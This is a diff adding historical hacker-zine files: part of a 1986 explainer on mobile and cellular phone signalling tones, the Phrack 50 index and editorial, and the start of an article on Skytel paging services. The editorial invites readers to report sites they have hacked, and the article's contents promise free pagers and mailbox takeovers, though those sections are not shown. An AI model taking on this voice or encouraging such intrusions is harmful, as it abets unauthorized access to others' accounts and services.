+ In this instance, let's say a call is being placed from a normal telephone to
+a Mobile unit. First off, the base station selects one idle channel and places
+a 2000Hz idle tone on it. All on hook Mobile units active in that service area
+find and lock onto the channel that carries the 2000Hz idle tone. Now each
+Mobile unit listens for it's specific number on that channel. When an idle
+channel becomes busy, a new channel is selected for use, and the process is
+repeated.
+ Now the caller's call is sent through the telephone network the same way as a
+normal telephone call. When this call reaches the control terminal, the
+terminal seizes the already marked idle channel (with every on-hook mobile unit
+listening to it) and applies a 1800Hz seize tone. This tone keeps other mobile
+units from using it to complete other calls. The called number is outpulsed
+over the base station transmitter at ten pulses per second, with idle tone
+represented as a mark, and a seize-tone represented as a space.
+ Since every idle mobile unit is waiting on that channel, they compare the
+number being outpulsed with their own number. If the first digit of the called
+mobile unit is three, and a specific mobile unit 'listening' on the channel has
+a first digit of four, it stops listening to that channel, and moves to the
+next channel with 2000Hz applied.
+  When the mobile unit receives the correct destination number, all other
+mobile units are no longer listening on that particular channel. When the 7
+digit number is received, the mobile supervisory unit turns on the mobile
+transmitter and sends an acknowledgement signal (2150Hz guard tone) back to the
+control terminal. If this signal isn't received in three seconds after
+outpulsing, the seize tone is removed from that channel, and the call is
+dropped. If the signal is received at the control terminal, then the mobile
+phone will ring (standard two seconds on, four seconds off). If the mobile unit
+being called doesn't answer in forty five seconds, the call is also dropped.
+ When the person answers the mobile phone and takes it off hook, the mobile
+supervisory unit sends a connect tone of 1633Hz, for an answer signal. When
+this is received by the control terminal, the ringing stops, and a voice path
+between the two phones is established. When the mobile subscriber hangs up, a
+disconnect signal is sent which consists of alternating disconnect/guard tone
+(1336Hz and 2150Hz respectively) signals. Then the mobile unit begins searching
+for another idle channel, and readies itself for more calls.
+ For an outgoing call placed by the Mobile subscriber, the mobile unit must
+already be locked on the idle channel. If the unit is not, a warning light will
+flash advising the user of the problem. This is similar to a re-order signal.
+ If the unit is already on an idle channel, the calling number will be sent to
+the control terminal for billing purposes.
+
+CELLULAR TELEPHONES
+-------------------
+ To improve over the problems of mobile telephone service such as low amount of
+users, high price, etc. AT&T invented the Cellular Concept, or the AMPS
+(Advanced Mobile Phone System). This is the cellular phone concept that is used
+in major cities. Los Angeles, Ca. currently has the largest cellular
+communication system in the world.
+
+ Calls sent to cellular telephones are sent through the MTSO (Mobile
+Telecommunications Switching Office). The MTSO handles all calls to and from
+cellular telephones, and handles billing.
+ All incoming calls from the MTSO are sent to a Cell site in each cell, to the
+actual cellular telephone. The major difference between mobile and cellular is
+that cellular can use the same channel many more times than a mobile telephone
+system can, providing more customers and making the service less expensive.
+ Once a vehicle goes out of range of one cell site, the signal is transferred
+immediately, with no signal loss, to another cell site, where the call is
+continued without interruption. This is called a Cellular hand-off.
+ Cellular communications areas are divided up into several cells, like a
+honeycomb.
+
+DIAGRAM
+-------
+                                      /---\  /---\  /---\
+                                     /  *  \/  *  \/  *  \
+                        ====         |Cell ||Cell ||Cell  |
+                        |CO|         | Site|| Site|| Site |
+                        ====    /---\\     /\     /\     /
+                         |     /  *  \\---/  \---/  \---/
+                         |     |Cell | /---\  /---\
+                         |     | Site|/  *  \/  *  \
+                         |     \     /|Cell ||Cell  |
+                      ======    \---/ | Site|| Site |
+                      |MTSO|          \     /\     /
+                      ======           \---/  \---/
+
+                    ---------------------------------------
+ More cell sites are used for the area they are needed for. The signals are
+sent from the MTSO to the each cell site. So if you were travelling in the cell
+site to the far left, the signal from the MTSO would be sent to that cell. As
+you move, the signal is moved.
+
+ Here is a quote from AT&T's Cellular Telephones pamphlet.
+
+ 'AT&T cellular phone transmission sounds as good as your home and office
+phone. Basically it's a simple concept. Each metropolitan area is divided into
+sectors which form a honeycomb of cells. Each cell incorporates its own
+transmitter and receiver which connects to the local phone network.
+ As you drive from cell to cell, sophisticated electronic equipment transfers
+or 'hands off' the call to another cell site. This automatic sequence maintains
+service quality throughout the conversation without interruption.'
+
+
+ I hope this file has been of some assistance to anyone who is curious about
+the more technical aspects of the telephone system.
+
+References
+----------
+Understanding Telephone Electronics-by Texas Instruments 1983
+TELE Magazine issues three and four
+AT&T Mobile communications pamphlet
+AT&T Cellular concept pamphlet
+
+-End of file-
+   4/14/86
+
diff --git a/phrack50/1.txt b/phrack50/1.txt
new file mode 100644
index 0000000..84f6802
--- /dev/null
+++ b/phrack50/1.txt
@@ -0,0 +1,185 @@
+                                .oO Phrack 50 Oo.
+
+                            Volume Seven, Issue Fifty
+
+                                      1 of 16
+
+                                  Issue 50 Index
+                               ____________________
+
+                                 P H R A C K   5 0
+
+                                  April 09, 1997
+                               ____________________
+                            
+                                "The Perfect Drug"
+
+
+START the fireworks...
+ALERT the mass media...
+CUE up the Axel-F Beverley Hills Cop music...
+AND FOR THE LOVE OF GOD, SOMEONE NOTIFY MITCH KABAY...! 
+
+                                Phrack 50 is here.
+
+To celebrate this landmark event, for a limited time, we are offering *all*
+Phrack issues (including this one) at a special "WE-MUST-BE-OUT-OF-OUR-MINDS"
+rate of HALF-PRICE!!  That's right!  Now you can enjoy Phrack for 50% off
+the standard price of free!  Now you can enjoy your favorite electronic
+zine and still have enough money left over to get those breast implants! 
+
+<SOAPBOX>
+
+It seems, in recent months, the mass media has finally caught onto what we 
+have known all along, computer security _IS_ in fact important.  Barely a
+week goes by that a new vulnerability of some sort doesn't pop up on CNN.
+But the one thing people still don't seem to fathom is that _WE_ are the
+ones that care about security the most...  We aren't the ones that the
+corporations and governments should worry about...  We are not the enemy.
+
+Phrack is often described by the mass media as an 'Underground Hacker's Zine'
+run by `irresponsible` youths.  Compare Phrack's distribution with that of
+the security publications that charge just enough money to keep students
+and interested outsiders from reading it...  Then decide who is  
+`irresponsible`.  Phrack is often criticized by professionals as giving away 
+tools to people who aren't responsible enough to use them.  The fact is, we 
+are giving away tools to people who aren't rich enough to buy them.
+
+The parallels between Internet packet sniffing and phone wire tapping are
+enormous.  The abuses of wire tapping by government agencies are well 
+documented.  Not so well documented, however, are similar abuses by these same
+agencies across key Internet access points.  This is just another classic 
+example of the Government trying to assert complete control.  The Internet is,
+however, anarchistic by nature and dynamic by design.  It resists all attempts
+at governing and all attempts at control.  
+
+By providing a public compendium of the same knowledge, information and 
+resources that all the money in the world can buy, we help ensure that the 
+Internet will remain safe with the individual.  Knowledge is not power.  
+Knowledge is _empowerment_.
+ 
+</SOAPBOX>
+
+This issue contains a great deal of C source code.  Somewhere in the
+neighborhood of 5000 lines of C source.  To facilitate painless extraction
+of the code and support files into an arbitrarily designated hierarchical
+directory structure and still maintaining readability while in `zine`
+format, we developed a custom extraction utility. (Good lord that was a
+long sentence...)  Article 16 contains the source for extract.c, instructions
+for compilation and use can be found therein.
+
+---------------------------------------------------------------------------
+
+
+Enjoy the magazine.  It is for and by the hacking community.  Period.
+
+   
+                Editors : daemon9[route], Datastream Cowboy
+           Asst. Editor : Alhambra (appears courtesy of the guild corp.)
+                 On ice : Voyager
+                Mailboy : Erik Bloodaxe
+                   News : Alhambra, disorder
+ 	          Elite : snocrash
+             Best Coast : Left Coast
+                Fatstar : loadammo
+               Thinstar : nirva
+          SPOOOOOOOOON! : sirsyko
+Rocks the Fucking House : 16 Volt
+            Bad at pool : the NSA
+   Tip o' the black hat : omerta
+           Birthday Boy : loki
+             GET A LIFE : All you jennicam losers. (jennicam.simplenet.com)
+Shout outs / Thank yous : mudge (cos he just plain rules), the Guild and
+                          r00t, pyro, blaboo, o0, halflife, nihil (for
+                          dealing with my daily whining, working 6848 hours
+                          a week, and *still* providing the kickass article),
+                          alhambra (for coming through in a big way for Phrack 
+                          when other people let us down), mycroft (fruitbat),
+                          Juliet (cookies)
+
+Phrack Magazine V. 7, #50, April 09, 1997.   
+Contents Copyright (c) 1996/7 Phrack Magazine. All Rights Reserved.  Nothing 
+may be reproduced in whole or in part without written permission from the
+editors.  Phrack Magazine is made available quarterly to the public, free of 
+charge.  Go nuts people.  
+
+Subscription requests, articles, comments, whatever should be directed to:
+
+                phrackedit@infonexus.com      
+
+Submissions to the above email address may be encrypted with the following 
+key (note this is a REALLY NEW key, we promise not to lose it this time): 
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6.2
+
+mQENAzMgU6YAAAEH/1/Kc1KrcUIyL5RBEVeD82JM9skWn60HBzy25FvR6QRYF8uW
+ibPDuf3ecgGezQHM0/bDuQfxeOXDihqXQNZzXf02RuS/Au0yiILKqGGfqxxP88/O
+vgEDrxu4vKpHBMYTE/Gh6u8QtcqfPYkrfFzJADzPEnPI7zw7ACAnXM5F+8+elt2j
+0njg68iA8ms7W5f0AOcRXEXfCznxVTk470JAIsx76+2aPs9mpIFOB2f8u7xPKg+W
+DDJ2wTS1vXzPsmsGJt1UypmitKBQYvJrrsLtTQ9FRavflvCpCWKiwCGIngIKt3yG
+/v/uQb3qagZ3kiYr3nUJ+ULklSwej+lrReIdqYEABRG0D1BocmFjayBNYWdhemlu
+ZQ==
+=sdwc
+-----END PGP PUBLIC KEY BLOCK-----
+                                    
+	ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED
+
+Phrack goes out plaintext...  You certainly can subscribe in plaintext
+
+
+ 			   .oO Phrack 50 Oo.
+ 		 -------------------------------------
+			   Table Of Contents
+		
+ 1. Introduction                                       ... Phrack Staff   9K
+ 2. Phrack Loopback				       ... Phrack Staff  60K
+ 3. Line Noise				               ... various       72K 
+ 4. Phrack Prophile on Aleph1                          ... Phrack Staff   7K
+ 5. Linux TTY hijacking                                ... halflife      15K
+ 6. Juggernaut                                         ... route        123K
+ 7. SNMP insecurities                                  ... Alhambra      20K
+ 8. Cracking NT Passwords                              ... Nihil         17K
+ 9. SS7 Diverter plans                                 ... Mastermind    27K
+10. Skytel Paging and Voicemail                        ... pbxPhreak     36K
+11. Hardwire Interfacing under Linux                   ... Professor     11K
+12. PC Application Level Security                      ... Sideshow Bob  21K
+13. DTMF signalling and decoding                       ... Mr. Blue      17K
+14. DCO Operating System                               ... mrnobody      16K
+15. Phrack World News                                  ... Alhambra     110K
+16. extract.c                                          ... Phrack Staff   2K
+
+                                                                        523k
+
+ 		 -------------------------------------
+
+
+Every article in Phrack is written free of charge, for and by the hacking
+community.  If you are a hack, phreak, student, professor, professional,
+or even a loser with an idea and you have some knowledge or information
+you would like to empart, there are thousands of readers who would love 
+nothing more than to learn from you.  If you want to submit something 
+anonymously, it will stay anonymous, if you want attributation, feel free to 
+use your real name or a psuedonym.  The deadline for submissions to Phrack 51 is
+July 25th, 1997, but the earlier the better.  If you are planning on writing an
+article we'd like to hear from you as soon as possible.  
+
+If you don't think you are going to be able to write an article, but you have
+some comments about Phrack, commentary about the hacking world, funny stories,
+exploits, news items, or just want to tell us about the government site you
+just hacked (PGP'd and through an anonymous remailer PLEASE), we love getting
+mail.  PGP key and e-mail address are above. 
+
+
+                 -------------------------------------
+
+   
+" *pyro* phrack is my faith and the e-zine is my bible, you are one of my 
+         high priests! "
+                   	- Some IRC zealot 
+
+" ...r00t and the guild.... Like peanut-butter and jelly -- you could have 
+  one without the other, but *why* would you want to...? "
+                      	- route
+
+EOF
diff --git a/phrack50/10.txt b/phrack50/10.txt
new file mode 100644
index 0000000..757fa22
--- /dev/null
+++ b/phrack50/10.txt
@@ -0,0 +1,1155 @@
+                                .oO Phrack 50 Oo.
+
+                            Volume Seven, Issue Fifty
+
+                                     10 of 16
+  
+                         - Skytel Paging and Voicemail -
+                                  The PBXPhreak
+                               <pbx@crackhouse.com>
+
+  If you weren't aware, Skytel is the largest nationwide paging and wireless
+  messaging service in the United States.  If you want to use this to your
+  advantage,  keep reading...
+
+Table of Contents
+~~~~~~~~~~~~~~~~~
+  1.  Important SkyTel Numbers
+  2.  History of SkyTel
+  3.  SkyPager
+  4.  SkyWord Pagers
+  5.  SkyTel 2-Way Pagers
+  6.  SkyTel Extras . The SkyNews and SkyQuote
+  7.  SkyTel SkyFax Option.
+  8.  SkyTalk Option
+  9.  Sending a Message
+  10. SkyTel Coverage
+  11. International Access numbers to the SkyTel system.
+  12. SkyTel accessible by Land, Sea or Air.
+  13. Overview of SkyTel
+  14. Getting Phree SkyTel Pagers
+  15. Taking over a SkyTel Mailbox
+  16. Prefixes for SkyTel Pagers and Voicemail
+  17. Conclusion
+
+1. Important SkyTel Numbers.
+
+     800-456-3333 - Skytel Nationwide Sales Center
+     800-SKY-USER - Skytel Customer Service 
+     800-SKY-PAGE - Skytel Numeric Paging
+     800-SKY-GRAM - Skytel Alpha-Numeric Paging
+     800-SKY-TALK - Skytel Voice Mail
+     800-SKY-FAXE - Skytel Faxing
+     800-SKY-8888 - Skytel System Access
+
+2. History of SkyTel.
+
+   1987:
+
+   - SkyTel founded; first nationwide paging and wireless messaging
+     service.
+
+   1988:
+
+   - SkyTel offers first integrated voice messaging service: SkyTalk;
+     provides instant notification of voice messages.
+
+   1991:
+
+   - Mtel, the parent company of SkyTel, presents the concept of two-way
+     paging to the FCC.
+   - SkyTel launches SkyWord - the first nationwide alphanumeric messaging
+     service; subscribers can now receive text messages nationwide.
+   - SkyTel goes international, offering service in Canada and Mexico.
+
+   1992:
+
+   - SkyTel develops an X.400 gateway; subscribers can now integrate email
+     services with paging.
+   - Mtel awarded a Pioneer's Preference by the FCC guaranteeing a license
+     to deploy a two-way wireless communications network.
+
+   1993:
+
+   - SkyTel offers the first integrated information services - SkyNews,
+     news headlines broadcast to a SkyWord pager; and SkyQuote, stock
+     quotes broadcast to a SkyWord pager.
+   - SkyTel expands its range of integrated email services announcing
+     connectivity to Lotus cc:mail, Microsoft Mail, MCI Mail, and AT&T
+     PersonaLink.
+   - SkyTel expands international services to Asia Pacific and South
+     America.
+
+   1994:
+
+   - Mtel announces an alliance with Microsoft to co-develop products and
+     services for the Mtel two-way paging network.
+   - SkyTel collaborates with Toshiba to offer the first PC Card for
+     wireless messaging, the Noteworthy NewsCard, and offers the first
+     integrated wireless messaging solution for notebook computers,
+     SkyCard(r).
+   - SkyTel offers SkyFax, providing a toll-free fax-mailbox with instant
+     notification of incoming faxes for subscribers.
+   - Mtel purchases two nationwide licenses in FCC narrowband PCS auctions.
+   - Mtel acquires U.S. Paging Corp., a reseller of paging services to
+     major corporations nationwide.
+   - SkyTel provides an Internet gateway; subscribers can now send messages
+     to SkyTel pagers through the Internet.
+
+   1995:
+
+   - SkyTel announces that MCI will resell SkyTel paging services as part
+     of networkMCI products.
+   - SkyTel announces agreement with SONY Electronics Inc. whereby SONY
+     will distribute SkyTel pagers through retail network; this
+     announcement marks the entry of SkyTel into the retail market.
+   - SkyTel announces SkyTel 2-Way, the first two-way paging and wireless
+     messaging service; subscribers can automatically confirm receipt of
+     messages and respond directly from their pager.
+
+
+3. SkyPager.
+
+The SkyTel System keeps you in touch with clients, colleagues and family 
+members when you're on the road. Now you can receive important information
+quickly and accurately where you do business. People who need to reach you
+dial one toll-free phone number.  You'll never have to leave a trail of 
+telephone numbers or play another round of phone tag.
+
+SkyPager Features
+
+   - SkyPager can receive numeric messages up to 20 digits long.   
+     This can be the telephone number of someone who needs you or a
+     code (e.g., "911" if the office needs you to call in immediately).
+   - Page Recall provides quick message retrieval for times when you've
+     been out of coverage range or the pager has been turned off.
+   - Message senders can broadcast one message to multiple subscribers,
+     prioritize urgent messages and program messages for future delivery
+     for time-zone differences.
+   - Only SkyTel provides 24-hour a day, seven-day a week Customer Service,
+     and all calls are always toll-free. Or, use SkyTel Customer Service
+     Online to contact SkyTel.
+
+Hardware Features:
+
+   - New FLEX technology means longer battery life -- up to 5 months on
+     one AAA battery.
+   - Choice of several musical tones or silent vibration alert.
+   - Holds up to sixteen 20-digit messages.
+
+
+4. SkyWord Pagers:
+
+With SkyWord, you can receive text messages accurately and quickly. You
+know what's needed immediately, without picking up the phone to return the
+call.
+
+Skyword Features
+
+   - Receive text messages up to 240 characters in a hand-held unit.
+   - Receive notification of e-mail messages while you're on the road.
+     SkyTel e-mail integration is compatible with various e-mail systems.
+     Ask your SkyTel sales rep for details.
+   - SkyNews(r) news headlines are provided twice daily. Stay up to date,
+     even while traveling, on the economic, political, international and
+     financial news of the day.
+   - Page Recall provides quick message retrieval for times when you've
+     been out of range or the pager has been turned off.
+
+Sending Messages Is EASY!
+
+   - Use SkyWord Access or QuickAccess software. All you need is a
+     modem-equipped PC or Macintosh computer to easily send messages.
+   - Your callers can dictate a text message to a SkyTel Customer Messaging
+     Agent, toll-free 24-hours a day.
+
+Hardware Features:
+
+   - New FLEX technology means longer battery life -- up to 5 months on
+     one AA battery.
+   - Choice of several musical tones or silent vibration alert.
+   - Receive up to forty, 240-character messages.
+
+5. SkyTel 2-Way Pagers.
+
+Imagine the freedom of getting a question and pushing one button to 
+answer... from a pager small enough to fit in your hand. Your callers
+get answers quickly and easily by telephone, computer, e-mail or even
+on their SkyTel pager. And you reduce long-distance and cellular phone
+expenses!
+
+SkyTel 2-Way is the first and only service that allows you to respond to
+a message from a pager.
+
+The SkyTel 2-Way System acts as the clearinghouse for all outgoing and
+incoming messages.
+
+Messages to you:
+People sending you messages (senders) can do so by:
+
+   - phone (numeric, voice messages, or operator-assisted text messages)
+   - computer (SkyTel Access or QuickAccess software, e-mail, or palmtop
+     computer connection)
+
+Messages from you:
+And senders can get your response via:
+
+   - phone
+   - computer
+   - SkyWord or SkyTel 2-Way pagers
+
+Works with Other SkyTel Services:
+
+SkyTalk: Full-featured voice mail lets senders leave a detailed message
+         and then you call back to hear the reply.
+SkyNews: Headline news provided twice daily.
+
+The answer is in the palm of your hand With SkyTel 2-Way, your senders
+become your partners in communications. They compose messages with
+multiple-choice responses for you to choose from, such as:
+
+   - CLIENT WILL SIGN $80K CONTRACT IF WE CAN DELIVER BY 4/7
+   - PROCEED
+   - DO NOT PROCEED
+   - AWAIT MY CALL
+
+Or if your sender does not define responses, select from one of your SkyTel
+2-Way pager's 16 pre-programmed responses:
+
+   - YES/OK
+   - NO
+   - WILL CALL LATER
+   - CALL ME
+   - RUNNING LATE
+   - NEED MORE INFO
+   - SEND # TO CALL
+   - WHERE ARE YOU?
+   - WILL ARRIVE 15M
+   - WILL ARRIVE 30M
+   - TRAFFIC DELAY
+   - PICK ME UP
+   - BUSY
+   - FINISHED
+   - CALL HOME
+
+Senders can receive your response at their convenience, 24 hours a day by
+phone, PC or SkyTel pager.
+
+Unit Features And Operations
+
+   - weighs about 5-1/2 ounces
+   - runs for several weeks on single AAA-size alkaline battery
+   - flip-top cover protects the unit and houses the transmitter used to
+     send and receive messages
+   - messages can be up to 500 characters long, including customized reply
+     choices
+   - "Personal Folder" stores messages in the 100 kilobyte memory; message
+     length determines how many messages you can store
+
+Sending Messages
+
+With SkyTel 2-Way, anyone can send a message directly to SkyTel 2-Way
+subscribers and receive their replies.
+
+Message Sending Options:
+
+   - Telephone keypad: Call toll-free from any touch-tone telephone to send
+     a numeric message.
+   - Voice messaging: Leave a detailed message (for SkyTalk subscribers).
+   - Operator-assisted text messaging: Dial the SkyTel toll-free number and
+     speak to a Customer Messaging Agent who will type and send your
+     message.
+   - Personal computer and modem: Use SkyTel AccessTM or QuickAccess
+     software to compose and transmit messages on a modem-equipped
+     computer.
+   - E-mail: SkyTel 2-Way messages can be created and sent through any
+     Internet-based e-mail system. Replies will be directed back to the
+     e-mail address.
+   - Palmtop computer connections: SkyTel 2-Way subscribers can link their
+     Hewlett-Packard 100 or 200LXTM or OmniGo 100 palmtop computer to a
+     SkyTel 2-Way pager. Subscribers can then compose, transmit, receive,
+     relay, store and reply to SkyTel 2-Way messages.
+
+Receiving Replies
+
+With SkyTel 2-Way, senders know for certain whether their message was
+received and can easily check for their reply. Check each message sent over
+The SkyTel 2-Way System using these convenient options:
+
+Message Tracking and Reply Options
+
+   - Telephone: Whenever you send a message (by telephone or otherwise),
+     SkyTel assigns a unique confirmation number to that message. Senders
+     can call The SkyTel 2-Way System later and use the confirmation number
+     to check the status of the message and/or get their reply.
+   - Personal computer and a modem: Use SkyTel Access software to compose
+     and transmit messages. Then use the confirmation number to check the
+     status of messages and/or get your reply.
+   - E-mail: When you send a message via e-mail to a SkyTel 2-Way
+     subscriber, you'll receive your reply at your e-mail address.
+   - Pagers: Replies can be forwarded to a SkyWord (alphanumeric) or
+     SkyTel 2-Way pager.
+
+6. SkyTel Extra Features.
+
+SkyNews Features:
+
+   - Four headlines are broadcast twice each day - 12:30pm and     
+     5:00pm ET Monday Friday, 2:00 and 7:00pm ET Saturday and
+     Sunday.
+   - Headlines are transmitted FREE to all SkyWord and SkyTel 2-Way
+     pagers.
+   - Headline topics include: U.S. politics, U.S. business and economic
+     news, international events, Dow Jones industrial average updates and
+     the performance of leading stocks.
+   - In addition to the regular broadcasts, news alerts are sent as crucial
+     events occur in the U.S. or abroad.
+
+SkyNews Special Editions:
+
+If you need news about your specific industry, subscribe to SkyNews Special
+Editions.  Headlines are available about the following industries:
+
+           Finance
+           Telecommunications
+           Information Highway
+           Media
+
+There is an additional charge for SkyTel special editions.
+
+SkyQuote Features:
+
+Keep tabs on Wall Street with SkyQuote-the personalized financial   
+news service on SkyTel text messaging units. With SkyQuote, you'll
+be alerted twice each business day with pricing updates on four stocks or
+exchange indexes. You provide us with the stocks, choose the timing of your
+updates, and SkyTel will do the rest.
+
+Your messaging unit will alert you with the price of the most recent trade
+for each of the four companies you have selected. You will also receive Dow
+Jones headline alerts when significant news breaks on your selected
+companies.
+
+7. SkyTel SkyFax Option.
+
+Whoever invented the fax machine apparently didn't know much about doing
+business on the road. After all, you can't take the machine with you. It
+has very little interest in your schedule. And critical faxes have a way of
+arriving at the wrong place, and the wrong time.
+
+SkyFax Features:
+
+   - You are assigned a personal toll-free number that people use to send
+     you faxes.
+   - Notification on your SkyPager or SkyWord pager that a fax has
+     arrived in your mailbox.
+   - Dial a toll-free number to download the fax to fax machine of your
+     choice.
+   - SkyFax even works with your portable computer's send/receive fax
+     software.
+
+SkyFax Benefits:
+
+SkyFax offers total control over how and where people reach you with
+important fax messages.
+
+   - Toll-free number reduces long-distance charges.
+   - Download faxes at YOUR convenience.
+   - Senders don't have to know your travel schedule in order to send you
+     faxes -- you'll never miss an important fax.
+   - Your documents remain confidential, because you're in control.
+
+8. SkyTel SkyTalk Option.
+
+Now, when you travel, The SkyTel System will let you give the people who
+need to stay in touch with you one toll-free phone number where you can
+always be reached. Even if they don't know exactly where you are, they'll
+be able to call a single number and leave a voice message in your SkyTalk(r)
+voice mailbox. You'll be notified quickly that a message is waiting. Then
+you can retrieve it whenever you want.
+
+SkyTalk can also be used to send information to a whole group of people
+simultaneously with one phone call. Even if they're spread across Phoenix,
+Los Angeles, Boston and Miami, everyone will be notified in minutes.
+
+SkyTalk Features
+
+   - SkyTalk is an easily-accessible toll-free voice mail system that
+     notifies you when you have a message on your SkyPager, SkyWord or
+     SkyTel 2-Way pager.
+   - Personal toll-free access numbers are available to provide callers
+     with easy access to your voice mail. You can even forward your office
+     number to your toll-free Personal Access Number when you're traveling
+     so every caller can leave a message for you.
+   - You can access other parts of The SkyTel System easily, without
+     hanging up the phone. For example, you can reply directly to messages
+     from other subscribers, broadcast messages to a subscriber list and
+     redirect messages to other subscribers.
+
+Additional SkyTalk Features
+
+   - Personalized voice mail greeting -- your own words in your own voice.
+   - Security code to prevent unauthorized access.
+   - Spanish and Japanese language prompts available.
+   - Messages up to 5 minutes in length.
+   - Stores up to 20 messages for up to 14 days.
+   - Unretrieved messages stored for 72 hours.
+   - Toll-free access to your messages from over 40 countries around the
+     world (surcharge may apply).
+
+9. Sending a Message.
+
+     Make it simple for your clients and colleagues to remember how to
+     send you a message. Just include the instructions on your
+     business card! On the front, list the SkyTel 800 number and your
+     PIN along with all your other numbers. For more detailed
+     instructions, use the back of your card. These instructions can
+     be pre-printed on the card or printed on a sticker for attachment
+     later. To get started, please see the SkyWord example below.
+
+                             Sending Me A Page
+
+                            Dial 1-800-759-8888
+                             Enter PIN, press #
+                      Numeric message--press 1, then #
+                       Voice message--press 2, then #
+                         Dictated message--press 3
+                               Press # to end
+
+10. SkyTel Coverage.   
+
+SkyTel is the best single source for all of your messaging needs. For
+locally, nationally and internationally. People everywhere are taking
+advantage of SkyTel coverage flexibility. Whatever your lifestyle requires,
+SkyTel will easily provide a coverage plan that works for you.
+
+SkyPager and SkyWord Coverage Plans Include:
+
+Metro Service:
+
+If your business is conducted primarily in one metro area or state, but
+requires occasional travel to other parts of the country, The SkyTel System
+with Metro Service and Nationwide Now is your cost-effective messaging
+solution.
+
+Metro Plus:
+
+A broader 2- to 6-state zone. There are 21 pre-defined Metro Plus zones,
+each with nationwide access through Nationwide Now.
+
+Regional/Region Plus:
+
+East, West, Central, Southeast, Southwest or Midwest. Two regions can be
+combined (Region Plus service) for maximum coverage. Each can include
+Nationwide Now (Region Plus service is available for SkyPager only).
+
+Nationwide:
+
+Coverage in thousands of cities and towns across the United States.
+(SkyPager only)
+
+Nationwide Now:
+
+Nationwide Now is an exclusive SkyTel coverage feature that allows you to
+access our nationwide network when you travel out of your home coverage
+area.
+
+International:
+
+SkyTel International Service can be used in conjunction with any U.S.-based
+coverage plan:
+
+   - Simulcast service: Messages are always transmitted to U.S. and the
+     country(ies) of your choice.
+
+   - Follow-Me: Allows you to activate coverage (with a quick call into The
+     SkyTel System) to receive messages while traveling abroad. You choose
+     the country(ies) and length of time for international coverage.
+
+   - International coverage is available in the following countries:
+
+     Argentina
+     Bahamas
+     Bermuda
+     Brazil
+     Canada
+     Colombia
+     Ecuador
+     Guatemala
+     Hong Kong
+     Indonesia
+     Malaysia
+     Mexico
+     Peru
+     Philippines
+     Puerto Rico
+     Singapore
+     Uruguay (coming soon)
+     Venezuela
+
+     In the places you travel most, SkyTel goes along with you, giving
+     you reliable, efficient communications. Here's just a partial
+     listing of the United States and international coverage areas.
+
+     Skytel has a wide coverage area. I only listed U.S. cities with
+     a population of 75,000 or more.
+
+     ALABAMA
+     Birmingham
+     Huntsville
+     Mobile
+     Montgomery
+     Tuscaloosa
+
+     ARIZONA
+     Chandler
+     Glendale
+     Mesa
+     Phoenix
+     Scottsdale
+     Tempe
+     Tucson
+
+     ARKANSAS
+     Little Rock
+
+     CALIFORNIA
+     Alameda
+     Alhambra
+     Anaheim
+     Arden-Arcade
+     Bakersfield
+     Berkeley
+     Burbank
+     Carson
+     Chula Vista
+     Citrus Heights
+     Compton
+     Concord
+     Corona
+     Costa Mesa
+     Daly City
+     Downey
+     E. Los Angeles
+     El Cajon
+     El Monte
+     Escondido
+     Fairfield
+     Fremont
+     Fresno
+     Fullerton
+     Garden Grove
+     Glendade
+     Hayward
+     Huntington Beach
+     Inglewood
+     Irvine
+     Lancaster
+     Long Beach
+     Los Angeles
+     Modesto
+     Moreno Valley
+     Norwalk
+     Oakland
+     Oceanside
+     Ontario
+     Orange
+     Oxnard
+     Pasadena
+     Pomona
+     Rancho Cucamonga
+     Richmond
+     Riverside
+     Sacramento
+     Salinas
+     San Bernadino
+     San Buenaventura
+     San Diego
+     San Francisco
+     San Jose
+     San Mateo
+     Santa Ana
+     Santa Barbara
+     Santa Clara
+     Santa Clarita
+     Santa Monica
+     Santa Rosa
+     Simi Valley
+     South Gate
+     Stockton
+     Sunnyvale
+     Thousand Oaks
+     Torrance
+     West Covina
+     Westminster
+     Whittier
+
+     COLORADO
+     Arvada
+     Aurora
+     Boulder
+     Colorado Springs
+     Denver
+     Ft. Collins
+     Lakewood
+     Pueblo
+
+     CONNECTICUT
+     Bridgeport
+     Hartford
+     New Britain
+     New Haven
+     Norwalk
+     Stamford
+     Waterbury
+
+     DISTRICT OF COLUMBIA
+     Metro Area
+
+     FLORIDA
+     Clearwater
+     Coral Springs
+     Ft. Lauderdale
+     Gainesville
+     Hialeah
+     Hollywood
+     Jacksonville
+     Kendall
+     Miami
+     Miami Beach
+     Orlando
+     St. Petersburg
+     Tallahassee
+     Tampa
+
+     GEORGIA
+     Albany
+     Atlanta
+     Columbus
+     Macon
+     Savannah
+
+     HAWAII
+     Honolulu
+
+     IDAHO
+     Boise City
+
+     ILLINOIS
+     Arlington Heights
+     Aurora
+     Chicago
+     Decatur
+     Elgin
+     Joliet
+     Naperville
+     Peoria
+     Rockford
+     Springfield
+
+     INDIANA
+     Evansville
+     Ft. Wayne
+     Gary
+     Hammond
+     Indianapolis
+     South Bend
+
+     IOWA
+     Cedar Rapids
+     Davenport
+     Des Moines
+     Sioux City
+
+     KANSAS
+     Kansas City
+     Overland Park
+     Topeka
+     Wichita
+
+     KENTUCKY
+     Lexington
+     Louisville
+
+     LOUISIANA
+     Baton Rouge
+     Lafayette
+     Metairie
+     New Orleans
+     Shreveport
+
+     MARYLAND
+     Baltimore
+     Columbia
+     Silver Spring
+
+     MASSACHUSETTS
+     Boston
+     Brockton
+     Cambridge
+     Fall River
+     Lowell
+     Lynn
+     New Bedford
+     Newton
+     Quincy
+     Somerville
+     Springfield
+     Worcester
+
+     MICHIGAN
+     Ann Arbor
+     Clinton
+     Dearborn
+     Detroit
+     Worcester
+     Flint
+     Grand Rapids
+     Kalamazoo
+     Lansing
+     Livonia
+     Southfield
+     Sterling Heights
+     Warren
+     Westland
+
+     MINNESOTA
+     Bloomington
+     Duluth
+     Minneapolis
+     St. Paul
+
+     MISSISSIPPI
+     Jackson
+
+     MISSOURI
+     Independence
+     Kansas City
+     St. Louis
+     Springfield
+
+     MONTANA
+     Billings
+
+     NEBRASKA
+     Lincoln
+     Omaha
+
+     NEVADA
+     Las Vegas
+     Paradise
+     Reno
+     Sunrise Manor
+
+     NEW HAMPSHIRE
+     Manchester
+     Nashua
+
+     NEW JERSEY
+     Camden
+     Edison
+     Elizabeth
+     Jersey City
+     Newark
+     Paterson
+     Trenton
+
+     NEW MEXICO
+     Albuquerque
+
+     NEW YORK
+     Albany
+     Buffalo
+     Cheektowaga
+     New York
+     Rochester
+     Syracuse
